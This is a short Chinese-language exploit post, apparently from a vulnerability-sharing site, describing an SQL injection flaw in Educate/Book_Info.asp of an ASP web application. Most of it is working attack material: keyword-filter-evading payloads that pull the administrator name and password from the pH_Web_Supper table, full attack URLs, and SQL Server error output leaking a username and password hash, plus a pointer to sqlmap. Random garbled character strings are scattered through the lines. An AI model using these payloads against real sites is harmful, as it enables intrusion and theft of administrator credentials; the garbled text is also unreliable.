漏洞出现在Educate/Book_Info.asp
; F) {) G ~: @( Y; q此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
6 Z5 y3 L8 v2 n! S' jexp:如下, Q" E5 h" y; C3 e
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& R2 C+ p* X- T查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) W. v" k D0 K% A% z" P* d
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
6 O/ |* O6 z6 D) {) f- Y$ fMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'6 u+ }8 e5 \+ W8 |
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
0 I4 o- R/ q: T& {. |/Educate/Book_Info.asp,行 8
7 t# F) T8 X2 I& Q, Q5 u! W. q4 whttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)' z7 n" H* } K Y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
4 F6 B: F, c- X将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% F: [0 k9 k+ l7 Y% I5 z1 I, g
/Educate/Book_Info.asp,行 8 |